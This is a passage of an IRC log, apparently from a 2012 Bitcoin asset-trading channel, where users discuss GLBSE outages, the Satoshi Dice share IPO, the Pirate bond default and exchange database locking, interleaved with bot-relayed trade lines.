01:48:44 for sure. Aug 25 01:49:01 but if you're going to replicate it, you start with the security. then you add the availability/resilience. then the rest. Aug 25 01:49:06 can't build houses starting at the roof. Aug 25 01:49:30 ... Well yes and no Aug 25 01:49:48 look. bitcoinica tried to start from the roof. Aug 25 01:49:58 where it ended, we all knew it will end, you udnerstand ? Aug 25 01:50:05 it's been a sort of private internal joke since winter. Aug 25 01:50:32 But I'm pretty sure it was no hack... the way it's been handled... Aug 25 01:50:53 one in three ?! come on. one in three musta been a hack. Aug 25 01:51:02 Maybe Aug 25 01:51:11 Well, it's about building the houses starting from the foundations, or from the facade Aug 25 01:51:22 BTC-Mining mtgox learned this the hard way. Aug 25 01:51:30 huh Aug 25 01:51:32 they too stated with the roof. Aug 25 01:51:35 They're a lot of people building thing from the facade Aug 25 01:51:55 it seems a seat on the NYSE, allows you to trade, and doesn't get you an account history Aug 25 01:52:03 I think GLBSE was set up properly at the core. It's now rolling out new features Aug 25 01:52:05 rdponticelli actually, seems all the pervasive marketing has got everyone convinced that that;'s how "it works". you buy a domain and wham, are entrepreneurial nao and shit. Aug 25 01:52:22 Recently the API was moved apart from the core and it was reworked to work on multiple servers Aug 25 01:52:40 I can't check the security internally... Aug 25 01:52:49 BTC-Mining not exactly. recently, glbse got a shot to show itself that it's not a little toy, but something that might be maybe taken seriously Aug 25 01:52:49 about an hour to go, right? Aug 25 01:52:54 and it completely pissed all over that. Aug 25 01:52:57 Yea, it's a sign of the times.... Aug 25 01:53:11 Lots of marketing, lots of facade.... Aug 25 01:53:21 css3 Aug 25 01:53:23 And very little substance Aug 25 01:53:23 Well we'll see Aug 25 01:53:26 smickles i got Aug 24, 2012 22:52:57 p, Aug 25 01:53:27 pm* Aug 25 01:53:42 Off for now. Aug 25 01:53:47 i'm a bit excited for this :D Aug 25 01:53:58 me too tbh. Aug 25 01:54:21 surely nasdaq has membership Aug 25 01:54:23 I'm not talking about any particular site, but in general Aug 25 01:54:35 i'll see if i can find what features nasdaq offers Aug 25 01:55:32 mircea: I do like the core functionality, and the fact that mpex is fast and available. Aug 25 01:57:10 aite. Aug 25 02:23:14 any news on pirate today? Aug 25 02:23:29 good question Aug 25 02:24:36 gabbynot: according to this (https://bitcointalk.org/index.php?topic=101339.0) no Aug 25 02:24:46 i gambled a bit on some cheap PPT bonds…it'd be cool if they actually pay off Aug 25 02:25:16 thx Aug 25 02:26:23 SD IPO ETA? Aug 25 02:27:21 33 min Aug 25 02:27:29 iirc Aug 25 02:27:34 GLBSE ETA? Aug 25 02:27:41 5mins Aug 25 02:27:51 rolled back the software Aug 25 02:28:01 reserves again? Aug 25 02:28:01 had to cancell all buy orders as well Aug 25 02:28:05 yes Aug 25 02:28:17 oh man my buy order spam took forever Aug 25 02:28:54 Sounds good, I'll hang around to pay divs, thanks Aug 25 02:32:17 nefario: Are you working on offering some signed proof of ownership of shares, or some thing alike? Aug 25 02:33:58 no Aug 25 02:34:10 Shouldn't you? Aug 25 02:34:40 thats not what you asked Aug 25 02:34:58 No, true Aug 25 02:35:06 But that would be something.... Aug 25 02:35:09 rdponticelli: i've come to the conclusion that if you want that, each individual issuer is going to have to do that, keep a record of who has the proper claim on a share, and not be listed on an exchange of the current nature Aug 25 02:35:42 [GLBSE] [NYAN.C] 2 @ 0.84 = 1.68 BTC [-] Aug 25 02:36:09 [GLBSE] [NYAN.C] 2 @ 0.84 = 1.68 BTC [-] Aug 25 02:36:56 smickles how do you reason ? Aug 25 02:37:15 [GLBSE] [NYAN.C] 2 @ 0.84 = 1.68 BTC [-] Aug 25 02:37:42 [MPEX] [F.GIGA.ETF] 12389 @ 0.00099573 = 12.3361 BTC [+] Aug 25 02:39:02 mircea_popescu: if an exchange offered it, what happens if i sign my share to two different people at the same time? Aug 25 02:39:13 that's prolly a bad example Aug 25 02:39:18 [GLBSE] [OBSI.HRPT] 2 @ 0.1095 = 0.219 BTC [+] Aug 25 02:39:35 you don't sign your share tho, you jsut get a signed cert that you own so and so shares Aug 25 02:40:21 yeah, but what's the use of that? you wouldn't be able to sell it to someone 'off exchange', right? Aug 25 02:40:38 [GLBSE] [OBSI.HRPT] 2 @ 0.1095 = 0.219 BTC [+] Aug 25 02:40:45 [GLBSE] [PUREMINING] 2 @ 0.1186 = 0.2372 BTC [+] Aug 25 02:40:54 [GLBSE] [PUREMINING] 2 @ 0.1186 = 0.2372 BTC [+] Aug 25 02:41:08 [MPEX] [S.MPOE] 200 @ 0.00038452 = 0.0769 BTC [+] Aug 25 02:41:10 [MPEX] [S.MPOE] 38485 @ 0.00038475 = 14.8071 BTC [+] Aug 25 02:41:25 and if the share isn't removed from availability to sell on the exchange, the proof of ownership at time X is meaningless, 'cause i could sell it at time X + .01 Aug 25 02:41:46 [GLBSE] [PPT.DIV] 9 @ 0.299 = 2.691 BTC [+] Aug 25 02:42:07 [GLBSE] [PPT.DIV] 9 @ 0.299 = 2.691 BTC [+] Aug 25 02:42:07 well a per-share signed cert thing is practically requiring a bicoin for each asset Aug 25 02:42:11 which is hella expensive. Aug 25 02:42:35 one share was just an example Aug 25 02:42:41 it could be bundles Aug 25 02:42:49 [GLBSE] [GSDPT] 625 @ 0.0032 = 2 BTC Aug 25 02:42:49 but how do you force ppl to buy per bundle Aug 25 02:42:54 and if you do, then the bundle = 1 share. Aug 25 02:43:21 [MPEX] [S.MPOE] 10715 @ 0.00038475 = 4.1226 BTC [+] Aug 25 02:43:22 [MPEX] [S.MPOE] 21185 @ 0.00038496 = 8.1554 BTC [+] Aug 25 02:43:39 my point with that one, is that, you want proof of ownership (for wahtever reason) without having to appeal to the exchange (maybe it's offline, or went out of business suddenly) Aug 25 02:43:43 [GLBSE] [GSDPT] 625 @ 0.0032 = 2 BTC Aug 25 02:43:56 [GLBSE] [GSDPT] 6000 @ 0.0032 = 19.2 BTC Aug 25 02:43:59 thart doesn't work irl either. Aug 25 02:44:02 but it can only be proof of ownership at a given time Aug 25 02:44:31 well if exchange went out of biz then it's the proof of time at the end Aug 25 02:44:39 proof of ownership* at the end of time i mean. Aug 25 02:44:41 assuming you have that Aug 25 02:44:44 smickles: you're talking about an OT based system Aug 25 02:44:52 [GLBSE] [GSDPT] 3000 @ 0.0032 = 9.6 BTC Aug 25 02:44:58 ya, there's some guy developing something like that, i even donated Aug 25 02:45:01 what if you had proof you owned it 1 minute before the takedown Aug 25 02:45:01 not production ready yet. Aug 25 02:45:30 smickles: either it's on the server or it's not Aug 25 02:45:37 i think an individual company could do something like: Aug 25 02:45:39 if it's not then you get a signed cert of what it was Aug 25 02:45:57 [GLBSE] [GSDPT] 625 @ 0.0032 = 2 BTC Aug 25 02:46:15 give a signed doc saying "this is x shares of y and key ~~~~ owns it" Aug 25 02:46:27 [GLBSE] [GSDPT] 1 @ 0.0032 BTC Aug 25 02:46:27 they keep a record of that Aug 25 02:46:43 nefario: internal server error when I try to buy GSDPT Aug 25 02:46:45 [GLBSE] [NYAN.C] 2 @ 0.84 = 1.68 BTC [-] Aug 25 02:46:49 then ~~~ wants to sell a nomber of shares Aug 25 02:47:12 [GLBSE] [GSDPT] 1900 @ 0.0032 = 6.08 BTC Aug 25 02:47:17 so he signes the doc 'i sold a shares to @@@@ and retained b shares' Aug 25 02:47:23 then truns that into the issuer Aug 25 02:47:35 and gives a copy to @@@ Aug 25 02:48:01 if it's validated by the issuer, no problem Aug 25 02:48:43 nefario: is the order book here correct? https://glbse.com/asset/view/GSDPT Aug 25 02:48:45 actually, the issuer would sign the doc and give it to @@@ Aug 25 02:49:14 maximian: yes Aug 25 02:49:34 thx Aug 25 02:49:54 How many shares for Satoshi Dice will ever be issued on GLBSE? Aug 25 02:50:19 the max amount that can be purchased Aug 25 02:50:28 at most Aug 25 02:51:34 [GLBSE] [GSDPT] 10 @ 0.0032 = 0.032 BTC Aug 25 02:51:36 [GLBSE] [GSDPT] 1000 @ 0.0032 = 3.2 BTC Aug 25 02:51:41 There's millions for sale Aug 25 02:51:43 [GLBSE] [TYGRR.BOND-P] 7 @ 0.68 = 4.76 BTC [+] Aug 25 02:52:26 [GLBSE] [TYGRR.BOND-P] 7 @ 0.68 = 4.76 BTC [+] Aug 25 02:52:28 [GLBSE] [GSDPT] 1000 @ 0.0032 = 3.2 BTC Aug 25 02:52:51 The orderbooks gets no updates Aug 25 02:52:55 [GLBSE] [TYGRR.BOND-P] 7 @ 0.68 = 4.76 BTC [+] Aug 25 02:52:59 2 million in the first round Aug 25 02:53:13 [MPEX] [F.GIGA.ETF] 699 @ 0.00099573 = 0.696 BTC [+] Aug 25 02:53:18 [GLBSE] [GSDPT] 50000 @ 0.0032 = 160 BTC Aug 25 02:53:19 [GLBSE] [GSDPT] 1000 @ 0.0032 = 3.2 BTC Aug 25 02:53:22 [GLBSE] [GSDPT] 50000 @ 0.0032 = 160 BTC Aug 25 02:53:27 then += 5 Aug 25 02:53:31 then += 3 Aug 25 02:53:32 [GLBSE] [GSDPT] 300 @ 0.0032 = 0.96 BTC Aug 25 02:53:37 lol... Aug 25 02:53:40 [GLBSE] [GSDPT] 50000 @ 0.0032 = 160 BTC Aug 25 02:53:45 [GLBSE] [GSDPT] 6000 @ 0.0032 = 19.2 BTC Aug 25 02:53:47 [GLBSE] [GSDPT] 50000 @ 0.0032 = 160 BTC Aug 25 02:53:52 [GLBSE] [GSDPT] 1000 @ 0.0032 = 3.2 BTC Aug 25 02:54:04 I can make assbot repeat the transactions, they just don't occur... Aug 25 02:54:06 plus, the issuer can issue a max amount more specified by the ipo agreement Aug 25 02:55:12 did deadterra already have his buy order in? Aug 25 02:56:04 [GLBSE] [GSDPT] 1000 @ 0.0032 = 3.2 BTC Aug 25 02:56:09 alrighty folks, five minutes or less. Aug 25 02:56:09 are any of these GSDPT trades actually happening? Aug 25 02:56:13 No Aug 25 02:56:29 [GLBSE] [GSDPT] 10 @ 0.0032 = 0.032 BTC Aug 25 02:56:31 all the 50000k are mine, I only have 267 BTC tho. Aug 25 02:56:39 [GLBSE] [GSDPT] 1900 @ 0.0032 = 6.08 BTC Aug 25 02:56:45 Assbot records them, but the orderbooks/portfolio does not update Aug 25 02:57:10 [GLBSE] [GSDPT] 1000 @ 0.0032 = 3.2 BTC Aug 25 02:57:15 [GLBSE] [GSDPT] 1000 @ 0.0032 = 3.2 BTC Aug 25 02:57:19 [GLBSE] [GMVT-BOT] 1 @ 0.09999999 BTC [+] Aug 25 02:57:33 Nefario, better put a notice up Aug 25 02:57:43 notice? Aug 25 02:58:01 I think the orders are not processing Aug 25 02:58:01 [GLBSE] [GSDPT] 1000 @ 0.0032 = 3.2 BTC Aug 25 02:58:05 Im on it Aug 25 02:58:58 [GLBSE] [GIGAMINING] 2 @ 0.9788 = 1.9576 BTC [+] Aug 25 02:59:37 [GLBSE] [GSDPT] 1000 @ 0.0032 = 3.2 BTC Aug 25 02:59:39 [MPEX] [S.MPOE] 200 @ 0.00038447 = 0.0769 BTC [-] Aug 25 02:59:40 [MPEX] [S.MPOE] 11460 @ 0.00038369 = 4.3971 BTC [-] Aug 25 02:59:51 Can't you create a copy of GLBSE on a small VPS or something for which to test rolling updates and doing those kind of testing prior to rolling it out? Aug 25 03:00:07 [MPEX] [S.DICE] 80000 @ 0.003232 = 258.56 BTC Aug 25 03:00:07 [MPEX] [S.DICE] 10000 @ 0.003206 = 32.06 BTC [-] Aug 25 03:00:09 [MPEX] [S.DICE] 50000 @ 0.003206 = 160.3 BTC [-] Aug 25 03:00:10 [MPEX] [S.DICE] 3000 @ 0.003205 = 9.615 BTC [-] Aug 25 03:00:11 [MPEX] [S.DICE] 50000 @ 0.003205 = 160.25 BTC [-] Aug 25 03:00:12 [MPEX] [S.DICE] 115000 @ 0.003201 = 368.115 BTC [-] Aug 25 03:00:13 [MPEX] [S.DICE] 5000 @ 0.00320001 = 16.0001 BTC [-] Aug 25 03:00:15 [MPEX] [S.DICE] 90000 @ 0.00320001 = 288.0009 BTC [-] Aug 25 03:00:16 [MPEX] [S.DICE] 25000 @ 0.0032 = 80 BTC [-] Aug 25 03:00:16 [MPEX] [S.DICE] 5000 @ 0.0032 = 16 BTC [-] Aug 25 03:00:17 [MPEX] [S.DICE] 193648 @ 0.0032 = 619.6736 BTC [-] Aug 25 03:00:18 [MPEX] [S.DICE] 400000 @ 0.0032 = 1280 BTC [-] Aug 25 03:00:19 [MPEX] [S.DICE] 100000 @ 0.0032 = 320 BTC [-] Aug 25 03:00:20 [MPEX] [S.DICE] 2475 @ 0.0032 = 7.92 BTC [-] Aug 25 03:00:21 [MPEX] [S.DICE] 4900 @ 0.0032 = 15.68 BTC [-] Aug 25 03:00:22 [MPEX] [S.DICE] 1000 @ 0.0032 = 3.2 BTC [-] Aug 25 03:00:23 [MPEX] [S.DICE] 200000 @ 0.0032 = 640 BTC [-] Aug 25 03:00:25 [MPEX] [S.DICE] 31250 @ 0.0032 = 100 BTC [-] Aug 25 03:00:25 [MPEX] [S.DICE] 6683 @ 0.0032 = 21.3856 BTC [-] Aug 25 03:00:27 [GLBSE] [OBSI.HRPT] 1 @ 0.1095 BTC [+] Aug 25 03:00:32 [GLBSE] [GMVT-BOT] 1 @ 0.09999999 BTC [+] Aug 25 03:00:32 and we're live. Aug 25 03:00:33 [GLBSE] [GMVT-BOT] 19 @ 0.1 = 1.9 BTC [+] Aug 25 03:00:36 well, dood's rich Aug 25 03:00:42 I can see that... Aug 25 03:00:53 Almost all sold already eheh Aug 25 03:00:59 When's the next round? Aug 25 03:01:06 same time tomorro Aug 25 03:01:40 how many BTC raised this round? Aug 25 03:01:42 [GLBSE] [GSDPT] 1 @ 0.0032 BTC Aug 25 03:01:54 so far ~4.x k something Aug 25 03:02:05 !ticker S.dice Aug 25 03:02:08 Invalid ticker. Aug 25 03:02:09 [GLBSE] [GIGAMINING] 2 @ 0.9788 = 1.9576 BTC [+] Aug 25 03:02:09 [GLBSE] [GIGAMINING] 5 @ 0.979 = 4.895 BTC [+] Aug 25 03:02:10 [GLBSE] [GIGAMINING] 3 @ 0.98 = 2.94 BTC [+] Aug 25 03:02:11 [GLBSE] [GIGAMINING] 18 @ 0.9839 = 17.7102 BTC [+] Aug 25 03:02:13 [GLBSE] [GIGAMINING] 7 @ 0.984 = 6.888 BTC [+] Aug 25 03:02:13 !ticker S.DICE Aug 25 03:02:14 py 1372956 * .0032 Aug 25 03:02:16 Invalid ticker. Aug 25 03:02:20 mmm that's odd Aug 25 03:02:20 .py 1372956 * .0032 Aug 25 03:02:22 4393.4592 Aug 25 03:02:24 !ticker s.dice Aug 25 03:02:24 biggest IPO so far? Aug 25 03:02:25 Invalid ticker. Aug 25 03:02:33 wth assbot! kakobrekla !!! halp Aug 25 03:02:42 Jackmaninov possibly. Aug 25 03:02:51 .py (1372956 * .0032) * .998 Aug 25 03:02:52 4384.6722816 Aug 25 03:03:03 cue the next round of news coverage.... :P Aug 25 03:03:30 !ticker S.DICE Aug 25 03:03:32 Invalid ticker. Aug 25 03:03:40 well, i tried Aug 25 03:03:42 lol Aug 25 03:03:51 i think it must be in a db Aug 25 03:03:53 Still 627044 shares on the table Aug 25 03:04:26 mircea_popescu, its not in http://polimedia.us/bitcoin/mpex-vwap.php Aug 25 03:04:36 pwnd Aug 25 03:04:53 [MPEX] [S.DICE] 20000 @ 0.0032 = 64 BTC [-] Aug 25 03:04:57 aww oops. brb Aug 25 03:05:25 [MPEX] [S.MPOE] 46940 @ 0.00038369 = 18.0104 BTC [-] Aug 25 03:05:26 [MPEX] [S.MPOE] 9360 @ 0.00038336 = 3.5882 BTC [-] Aug 25 03:05:35 [GLBSE] [GSDPT] 1 @ 0.0032 BTC Aug 25 03:06:13 [GLBSE] [GSDPT] 300 @ 0.0032 = 0.96 BTC Aug 25 03:06:13 !ticker s.dice Aug 25 03:06:15 [MPEX:S.DICE] 1day: 0.0032 / 0.00320236 / 0.003232 (1392956 shares, 4,460.76 BTC), 30day: 0.0032 / 0.00320236 / 0.003232 (1392956 shares, 4,460.76 BTC) Aug 25 03:06:21 ty kakobrekla ! you fixed it ! Aug 25 03:06:25 :p Aug 25 03:06:27 zomg, trade happened Aug 25 03:06:28 [GLBSE] [GSDPT] 1000 @ 0.0032 = 3.2 BTC Aug 25 03:06:45 [GLBSE] [GSDPT] 999 @ 0.0032 = 3.1968 BTC Aug 25 03:06:49 i gots my 300 shares :P Aug 25 03:07:18 somebody save some money for smpake Aug 25 03:07:20 jesus a mosquito went up my nostril Aug 25 03:07:22 wth! Aug 25 03:07:28 [GLBSE] [GSDPT] 20 @ 0.0032 = 0.064 BTC Aug 25 03:07:29 I hate that too Aug 25 03:08:46 GSDPT asks go bye bye Aug 25 03:08:52 MMMIIIINNNNEES Aug 25 03:10:06 [GLBSE] [FPGAMINING] 20 @ 0.86 = 17.2 BTC [-] Aug 25 03:10:34 I don't see the bot relaying the trade Aug 25 03:11:12 which bot? Aug 25 03:11:15 assbot? Aug 25 03:11:16 wow asks got wiped ? Aug 25 03:11:19 yeah Aug 25 03:11:25 o, there were only 50k of them huh Aug 25 03:11:30 No more ask on GLBSE Aug 25 03:11:38 Yeah, just a little passthrough Aug 25 03:11:44 where is deadterra lol Aug 25 03:11:58 anyone got his cell/email/etc ? Aug 25 03:12:03 I wonder Aug 25 03:12:22 02:10.26 ( BTC-Mining ) I don't see the bot relaying the trade Aug 25 03:12:28 nothing on the twitter Aug 25 03:12:34 MBOT relayed the trade, not assbot Aug 25 03:12:42 o? Aug 25 03:12:44 from #bitcoin-shares Aug 25 03:12:53 lemme see Aug 25 03:12:57 what i have in teh logs Aug 25 03:13:12 [20:07] <`MBot> [ GLBSE ] [ ~TRADE ] [ GSDPT ] [ 47679 @ 0.0032 = 152.5728 ] Aug 25 03:13:52 [MPEX] [S.MPOE] 4900 @ 0.00038336 = 1.8785 BTC [-] Aug 25 03:13:53 [MPEX] [S.MPOE] 21900 @ 0.00038278 = 8.3829 BTC [-] Aug 25 03:14:03 ya that's right, sell me :( haters! Aug 25 03:14:07 ok, so i guess all those trades for GSDPT 20 minutes ago went through? Aug 25 03:14:23 or at least some of them? Aug 25 03:14:30 i think BTC-Mining just wiped it a minute ago. Aug 25 03:14:38 Nah, only just now they started going through Aug 25 03:14:52 well someone has 47679 of them Aug 25 03:14:54 [MPEX] [S.DICE] 4500 @ 0.0032 = 14.4 BTC [-] Aug 25 03:15:35 unless deadterra cranked his ask price Aug 25 03:15:59 I doubt he'd do that... Aug 25 03:16:13 He sells at MPEX price Aug 25 03:16:18 and take 5% Aug 25 03:16:43 lol, that's a [-] Aug 25 03:16:48 after GLBSE: trade:20@0.0032:GSDPT:1345853241, twitter feed went down, apparently my timeout is longer than mbots (90 seconds) Aug 25 03:17:10 BTC-Mining: to be clear, that's 5% of the dividend, right? Aug 25 03:17:32 smickles yea Aug 25 03:18:19 how does twitter's new api affect us here Aug 25 03:18:25 yes smickles Aug 25 03:18:26 glbse/assbot/mbot? Aug 25 03:19:27 Is deadterra issuing more shares for next rounds? Maybe I can buy them up Aug 25 03:19:45 like, not being allowed to display twitter content along side non twitter content < new rule Aug 25 03:20:28 smickles what's that ?! Aug 25 03:20:55 it ain't frigging "twitter content" its my content. Aug 25 03:20:56 wtf. Aug 25 03:21:10 yeah, let me find the exact wording Aug 25 03:22:14 so, assbot/mbot are considered twitter apps per twitter Aug 25 03:22:18 He's speaking about the twitter feed for GLBSE Aug 25 03:22:38 well not sure if yours use that too? Aug 25 03:22:40 well i guess someone will have to write a rss parser and parse my rss Aug 25 03:22:44 BTC-Mining yea Aug 25 03:22:51 mircea_popescu lol Aug 25 03:23:02 kakobrekla wha! parse my rsssss! Aug 25 03:23:15 never! Aug 25 03:23:45 meh fuck twitter Aug 25 03:24:07 oh yeah Aug 25 03:24:17 authentication will be required to poll the api Aug 25 03:24:19 [MPEX] [F.GIGA.ETF] 8500 @ 0.00099504 = 8.4578 BTC [-] Aug 25 03:24:21 [MPEX] [F.GIGA.ETF] 2335 @ 0.00099438 = 2.3219 BTC [-] Aug 25 03:24:33 my bot should be authed Aug 25 03:24:38 kakobrekla tbh i'd much rather i went off twitter. i dun like them Aug 25 03:24:38 350 call per hour Aug 25 03:24:49 and it won't scale too well in the future anyway Aug 25 03:24:57 im plugged into stream Aug 25 03:25:06 so Aug 25 03:25:12 do we need a platform for this Aug 25 03:25:34 GLBSE is back to normal Aug 25 03:26:09 apps will be required to display retweet/reply/favorite Aug 25 03:26:13 ^killer Aug 25 03:26:35 yeah Aug 25 03:26:36 but Aug 25 03:26:41 that will be only for big apps Aug 25 03:26:49 noone will give a shit for #bitcoin-assets Aug 25 03:26:54 kakobrekla i seriosuly say twitter won't scale. Aug 25 03:27:01 unless we hit 10k users Aug 25 03:27:16 so whats up with priate debt? Aug 25 03:27:20 or pirte and repayment lol Aug 25 03:27:26 i see shares are way low Aug 25 03:27:36 thanks nefario... Aug 25 03:27:40 np Aug 25 03:28:09 mircea_popescu, well i guess we will cross that bridge when we come to it Aug 25 03:28:12 bah, i can't continue to recite the new twitter rules, my wife wants to drink and watch america's next top model Aug 25 03:28:27 poor smick. Aug 25 03:28:35 you watch babes with wife ? Aug 25 03:28:45 Can't you have a testing platform like testing.glbse.com with all features working? Placed on another server with a backup of the current GLBSE, where me and others here could go and go crazy on doing transactions and whatnot to test new features? Aug 25 03:29:09 [GLBSE] [OBSI.HRPT] 7 @ 0.1095 = 0.7665 BTC [+] Aug 25 03:29:23 I volunteer to take part in those Aug 25 03:29:29 did all the bids on glbse get cleared?? Aug 25 03:29:30 basically, twitter is trying to put the 'keebash' on syndication Aug 25 03:29:40 which es exactly assbot Aug 25 03:29:46 Chaang-Noi, yes Aug 25 03:29:52 lol why? Aug 25 03:30:33 BTC-Mining: I did, you don't think that I tested the new version? Aug 25 03:30:50 At first ran it on a separate server Aug 25 03:30:57 when I moved it to the current machine Aug 25 03:31:00 I supposed so, but seems we still encountered issues Aug 25 03:31:03 wouldn't work Aug 25 03:31:13 glbse says my password is incorrect Aug 25 03:31:17 then ran it alongside the current server Aug 25 03:31:22 is it back up and running? Aug 25 03:31:36 BTCHero: yes, whats your username? Aug 25 03:31:40 I mean, with an actual backup of current GLBSE state put on a testing servers and letting us know, we could further mess with multiple transactions. Aug 25 03:31:41 you might need to reset Aug 25 03:31:41 [GLBSE] [GMVT-BOT] 200 @ 0.1 = 20 BTC [+] Aug 25 03:31:41 BTCHero Aug 25 03:31:46 NOOOOOOO Aug 25 03:32:06 ? Aug 25 03:32:43 BTC-Mining: you don't see a lot of problems until you launch the system live Aug 25 03:33:09 In testing I didn't have any issues with deadlock Aug 25 03:33:16 Wouldn't using a full backup and letting a few dozen of us go crazy on it help tho seeing how it would behave live? Aug 25 03:34:09 [GLBSE] [FOO.PPPPT] 10 @ 0.72 = 7.2 BTC [+] Aug 25 03:34:27 possibly Aug 25 03:34:56 I reset my password and i still can't get in Aug 25 03:34:56 I wouldn't mind helping along others do that Aug 25 03:35:08 Could get in right away =/ Aug 25 03:35:20 You sure you're not mixing a character up in that password? Aug 25 03:35:38 i don't know, I will try it again Aug 25 03:36:32 BTCHero try logging in now Aug 25 03:36:50 ok now it works Aug 25 03:37:04 [GLBSE] [BLUECHIP] 28 @ 0.1 = 2.8 BTC Aug 25 03:37:04 shouldn't the new reserve less balance be implemented now? Aug 25 03:37:12 Wasn't it what you were rolling out? Aug 25 03:37:17 no Aug 25 03:37:25 Oh =P Aug 25 03:37:31 I was rolling out a sytem that uses locking Aug 25 03:37:43 allowing multiple servers to access account balances Aug 25 03:37:48 without writing over each others stuff Aug 25 03:38:14 I've been using queues for a lost of GLBSE stuff since GLBSE 2.0 first launched Aug 25 03:38:26 moved more over to that method Aug 25 03:38:55 oh, great Aug 25 03:39:05 We'll need more servers servicing the platform eh Aug 25 03:39:24 We'll I've got another dedi just for the DB Aug 25 03:39:41 but it's not going to happen without being able to run multiple application servers Aug 25 03:39:56 people are buying pirate debt at .72 interesting Aug 25 03:40:10 which isn't happening without locking sorted Aug 25 03:40:21 Chaang-Noi: whats the story with that piotr guy? Aug 25 03:40:31 heis a crazy troll Aug 25 03:40:37 seems so Aug 25 03:40:40 he has gone to allmy threads and made FUD Aug 25 03:40:50 he thought he had me on something and went nuts Aug 25 03:40:56 he's been having a go at me since I didn't agree with him Aug 25 03:40:57 then when you did not back him up, when relly nuts Aug 25 03:41:21 that transfer was coin going back to a guy who sent to me Aug 25 03:41:39 I don't really care Aug 25 03:41:49 it's before the time pirate announced Aug 25 03:41:49 the guy wanted me to buy them, so i said send to me, when i pay dividends ill send you the interes and the coins, but then pirate defaulted so the guy was like i want them back to sell on the open market Aug 25 03:41:52 I showed him wrong about one of his claims. Aug 25 03:41:56 i said okay, here you go Aug 25 03:42:02 and paidt he fee to send back Aug 25 03:42:11 then i bought 800 plus bonds... Aug 25 03:42:22 that guy was just a fail cat... Aug 25 03:42:32 ill post some copy and paste dates and shit from glbse once i get home Aug 25 03:42:35 im still not homer Aug 25 03:42:39 home* Aug 25 03:42:46 > 02:42.26 ( Chaang-Noi ) im still not homer Aug 25 03:42:48 that guy owes me an apology Aug 25 03:42:50 homer. :) Aug 25 03:43:02 :) Aug 25 03:43:02 fucking phone Aug 25 03:43:04 Chaang-Noi: good luck getting one Aug 25 03:43:19 i ment 'Homer'. Aug 25 03:43:22 but yeah. Aug 25 03:43:32 [GLBSE] [PUREMINING] 9 @ 0.118 = 1.062 BTC [-] Aug 25 03:43:39 he said he would, so we will see Aug 25 03:43:48 he has been calling me all sorts of names and so Aug 25 03:43:52 iv done nothing at all wrong Aug 25 03:43:57 You can reason with piotr, I recall he apologized in PPT's thread Aug 25 03:44:02 im updet i cant ban people like that from my threads Aug 25 03:44:07 But yeah, he's inquisitive Aug 25 03:44:13 he is an asshole Aug 25 03:44:24 he called me names and said i was doing all sorts of evil shit with no proff Aug 25 03:44:35 [GLBSE] [CPA] 1 @ 0.099 BTC [+] Aug 25 03:44:39 Until you can make him realize there's a mistake in his reasoning. Aug 25 03:44:49 Then he apologize... Aug 25 03:45:04 he has attacked me in every bond thread i have Aug 25 03:45:21 and he attacked nefario for some aood reason Aug 25 03:45:32 like nefario and i have this scam going lol Aug 25 03:46:08 so all bids got erased right? Aug 25 03:46:15 I know, we're like twins Aug 25 03:46:20 locking is always dangerous Aug 25 03:46:24 yes Aug 25 03:46:50 matthew moved his bet limit up to 1000 btc hmm Aug 25 03:47:02 but most databases support transactions... Aug 25 03:47:11 agath: As I've learned the hard way Aug 25 03:47:14 that should be the good choice if your architecture allows it Aug 25 03:47:59 but I don't know anything more than what I can see from the web service so I think I can't give you any hint, I guess you know better.. :-) Aug 25 03:48:04 I don't see how transactions handle concurrent access to a resource that shouldn't be ..concurrently accessed Aug 25 03:48:20 like if I run more than one app server Aug 25 03:48:30 when you start a transaction, the database guarantees data integrity Aug 25 03:48:37 Chaang-Noi, you mean 10000BTC? Aug 25 03:48:39 even if the operation is made from different hosts Aug 25 03:48:43 Been like that for a while Aug 25 03:48:47 then you'll get a situation where the other server has stale data Aug 25 03:48:51 i mena per person Aug 25 03:48:56 [GLBSE] [TYGRR.BOND-P] 2 @ 0.6 = 1.2 BTC [-] Aug 25 03:48:57 [GLBSE] [TYGRR.BOND-P] 2 @ 0.5 = 1 BTC [-] Aug 25 03:49:00 it was 100 then 250 now atleast 1000 perperson Aug 25 03:49:12 how? anyway I don't know your architecture enough.. so I can't say... Aug 25 03:49:12 Oh that, he accepted larger bids from hedgers that had capital owned by pirate. Aug 25 03:49:26 anyway if it can be done with locks I think it should be doable with transactions too Aug 25 03:49:34 matthews faith made me buy more bonds Aug 25 03:49:37 So if pirate paid, they owed some or all of it to him. Aug 25 03:49:38 im sure he knows somehting Aug 25 03:49:46 [GLBSE] [BIB.PIRATE] 1 @ 0.33 BTC [-] Aug 25 03:50:03 Well if pirate doesn't pay... He'd better pay up Aug 25 03:50:04 however iv been buying bonds under .5 something mathew cant do unless he had btc lol Aug 25 03:50:12 i think its a bluff i dont think matthew has the 10,000 bt Aug 25 03:50:16 btc Aug 25 03:50:26 Even Theymos bet against pirate Aug 25 03:50:28 he prolly got a personal loan of credit :D Aug 25 03:50:35 Well, see it that way... Aug 25 03:50:38 im not so sure... Aug 25 03:51:00 [GLBSE] [OBSI.ABMO] 180 @ 0.08 = 14.4 BTC [-] Aug 25 03:51:46 The community would get really pissed if he doesn't pay up and he's bluffing. Aug 25 03:52:03 and we will all be like, hey dude that wasn't cool Aug 25 03:52:05 Since you two don't like each other, I think you wouldn't mind either cases. Aug 25 03:52:08 [GLBSE] [PUREMINING] 2 @ 0.118 = 0.236 BTC [-] Aug 25 03:53:01 matthew has been borrowing money Aug 25 03:53:10 he wil clearly be forced to leave, no way he has 100k btc Aug 25 03:53:12 [GLBSE] [GSDPT] 50 @ 0.0045 = 0.225 BTC [+] Aug 25 03:53:17 i mean 100k usd Aug 25 03:53:20 he might however have a backer Aug 25 03:53:23 will be interesting to see Aug 25 03:53:32 the guy has at least three backers. Aug 25 03:53:43 like any self respecting call girl. Aug 25 03:53:50 lol Aug 25 03:54:21 any of you see that pic of him wiping off makup? Aug 25 03:54:28 lol no Aug 25 03:55:27 nope Aug 25 03:55:42 its on one of the reddit threads Aug 25 03:56:17 ;;later tell deadterra you really need to put more shares up. Aug 25 03:56:18 The operation succeeded. Aug 25 03:56:21 Is everyone in the BTC community mad/crazy/psycho/paranoid/other variant? Aug 25 03:57:00 http://i.imgur.com/zvxAq.jpg Aug 25 03:58:53 ^^ MNW with lady boys taking off makup ^^ Aug 25 04:01:21 those ARE ladyboys aren't they Aug 25 04:01:30 you being the expert Aug 25 04:01:43 i have no ideea Aug 25 04:01:50 not many in yurp. Aug 25 04:02:21 [GLBSE] [BBBB] 1 @ 0.00399 BTC [+] Aug 25 04:02:25 